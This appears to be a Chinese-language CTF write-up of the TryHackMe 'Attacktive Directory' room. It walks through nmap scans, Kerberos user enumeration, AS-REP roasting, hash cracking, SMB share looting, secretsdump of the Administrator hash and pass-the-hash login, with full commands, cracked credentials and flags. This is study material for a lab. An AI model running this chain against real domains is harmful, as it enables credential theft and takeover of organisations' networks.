打靶记录(四六)之THMAttacktiveDirectory

端口扫描

sudo nmap --min-rate 10000 -p- 10.10.55.102
[sudo] mikannse 的密码：
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-24 21:23 CST
Warning: 10.10.55.102 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.55.102
Host is up (0.25s latency).
Not shown: 64327 closed tcp ports (reset), 1182 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49668/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49675/tcp open  unknown
49678/tcp open  unknown
49685/tcp open  unknown
49699/tcp open  unknown

sudo nmap -sT -sV -sC -O -p53,80,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,47001,49664,49665,49666,49668,49673,49674,49675,49678,49685,49699 10.10.55.102
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-24 21:25 CST
Nmap scan report for 10.10.55.102
Host is up (0.25s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-09-24 13:25:32Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-09-24T13:26:58+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2023-09-23T13:21:48
|_Not valid after:  2024-03-24T13:21:48
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  unknown
49685/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2019 (99%), Microsoft Windows 10 1709 - 1909 (96%), Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (96%), Microsoft Windows Server 2012 R2 Update 1 (96%), Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Longhorn (96%), Microsoft Windows Server 2012 or Server 2012 R2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-09-24T13:26:43
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.08 seconds

添加spookysec.local到hosts

发现是开启了139和445的SMB服务，根据房间提示，使用enum4linux

enum4linux -a 10.10.55.102

可以看到Domian Name是

THM-AD

nmap扫描中看到一个spookysec.local,其中.local是Invalid TLD(即无效的顶级域名)

Kerberos（Getshell）

下载房间所给的用户和密码字典

kerbrute userenum userlist.txt --dc 10.10.55.102 -d spookysec.local -v

得到挺多用户的，但是房间的答案是svc-admin和backup

房间提示可以无密码查询票单

两个用户都试一下，添加到字典user.txt

impacket-GetNPUsers spookysec.local/  -usersfile user.txt -no-pass -dc-ip 10.10.55.102 -request>hash

svc-admin可以无密码查询

查询，哈希全名是Kerberos 5 AS-REP etype 23，模式是18200

john --wordlist=/usr/share/wordlists/rockyou.txt hs

得到密码：management2005

smbclient -L 10.10.55.102 -U svc-admin

得到6个共享

smbclient \\\\10.10.55.102\\backup -U svc-admin

有一个文本文件，base64解码后

backup@spookysec.local:backup2517860

evil-winrm -i 10.10.55.102 -u backup -p backup2517860

evil-winrm用不了，那就用3389的远程桌面

我的话用的是remmina来连接

桌面有一个flag

TryHackMe{B4ckM3UpSc0tty!}

发现svc-admin也是可以远程桌面登录的

flag

TryHackMe{K3rb3r0s_Pr3_4uth}

提权

房间提示用secretdump,kali默认有下载

看下咋用

python /usr/share/doc/python3-impacket/examples/secretsdump.py -h |grep "NTDS.DIT"

python /usr/share/doc/python3-impacket/examples/secretsdump.py spookysec.local/backup:backup2517860@spookysec.local -just-dc-user Administrator

指定提取管理员的哈希

方法好像是DRSUAPI

管理员的哈希是：0e0363213e37b94221497260b0bcb4fc

evil-winrm允许我们用哈希来登录，方法是pass the hash

evil-winrm -i 10.10.55.102 -u administrator -H 0e0363213e37b94221497260b0bcb4fc

提权成功，root.txt

TryHackMe{4ctiveD1rectoryM4st3r}

碎碎念

这种引导性的房间还是很适合我这种域新手来学的233，虽然说大部分内容都学过,顺便复习一下!